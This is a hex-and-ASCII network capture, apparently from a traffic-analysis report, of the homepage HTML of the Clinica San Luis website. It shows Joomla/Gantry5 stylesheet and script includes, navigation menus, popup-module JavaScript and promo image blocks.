                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2853INData Raw: 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68
                                                                                                                                                                                                                                                                        Data Ascii: link href="/plugins/system/rokbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link h
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2855INData Raw: 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c
                                                                                                                                                                                                                                                                        Data Ascii: c="/media/system/js/core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2856INData Raw: 73 65 74 73 2f 6a 73 2f 68 74 6d 6c 35 73 68 69 76 2d 70 72 69 6e 74 73 68 69 76 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                        Data Ascii: sets/js/html5shiv-printshiv.min.js"></script> <link rel="stylesheet" href="/media/gantry5/users/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2857INData Raw: 65 73 74 72 61 5f 63 6c 69 6e 69 63 61 2f 6c 6f 67 6f 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2e 70 6e 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70
                                                                                                                                                                                                                                                                        Data Ascii: estra_clinica/logo_horizontal.png" alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-top
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2859INData Raw: 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 23 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 20 3c 73 70 61 6e 20 63 6c
                                                                                                                                                                                                                                                                        Data Ascii: -menu-item-container" href="#" data-g-menuparent=""><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"> <span cl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2860INData Raw: 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63
                                                                                                                                                                                                                                                                        Data Ascii: class="g-menu-item-content"><span class="g-menu-item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-c
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2861INData Raw: 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 70 6f 6c 69 74 69 63 61 73 2d 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d
                                                                                                                                                                                                                                                                        Data Ascii: dex.php/nuestra-clinica/politicas-institucionales"><span class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-m
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2863INData Raw: 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                        Data Ascii: ass="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2864INData Raw: 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                        Data Ascii: ><li class="g-menu-item g-menu-item-type-component g-menu-item-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2865INData Raw: 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 53 49 43 4f 46 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: m-content"><span class="g-menu-item-title">SICOF</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-cont
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2867INData Raw: 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 63 72 c3 ad 62 65 6e 6f 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75
                                                                                                                                                                                                                                                                        Data Ascii: ="g-menu-item-content"><span class="g-menu-item-title">Escrbenos</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2868INData Raw: 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61
                                                                                                                                                                                                                                                                        Data Ascii: pan></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-385 "><a class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></spa
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2869INData Raw: 20 65 73 70 65 72 61 6e 7a 61 20 64 65 6c 20 6d 61 c3 b1 61 6e 61 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 74 66 6f 72 6d 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30
                                                                                                                                                                                                                                                                        Data Ascii: esperanza del maana</div></div> </div><div class="platform-content"><div class="moduletable "><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2871INData Raw: 70 65 6e 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 6f 70 65 6e 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09
                                                                                                                                                                                                                                                                        Data Ascii: penEffect: 'none', //elastic, fade or none openSpeed : 250, closeEffect: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2872INData Raw: 61 68 6f 6c 69 63 27 29 3b 0d 0a 09 72 65 66 49 44 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e 65 22 3b 09 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 73 74 75 66 66 28 62 6f 78 69 64 29 7b 0d 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37
                                                                                                                                                                                                                                                                        Data Ascii: aholic');refID.style.display = "none";}function hidestuff(boxid){ document.getElementById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto37
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2873INData Raw: 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64
                                                                                                                                                                                                                                                                        Data Ascii: ze-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><d
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2875INData Raw: 20 68 69 64 64 65 6e 2d 70 68 6f 6e 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 73 74 6f 6d 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 68 69 64 64 65 6e 2d 70 68 6f 6e 65 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61
                                                                                                                                                                                                                                                                        Data Ascii: hidden-phone"><div class="customg-animatedblock hidden-phone"><img src="/images/rocketlauncher/home/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div cla
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2876INData Raw: 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d
                                                                                                                                                                                                                                                                        Data Ascii: icon"></div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2877INData Raw: 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f
                                                                                                                                                                                                                                                                        Data Ascii: ><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt=""><div class="g-pro
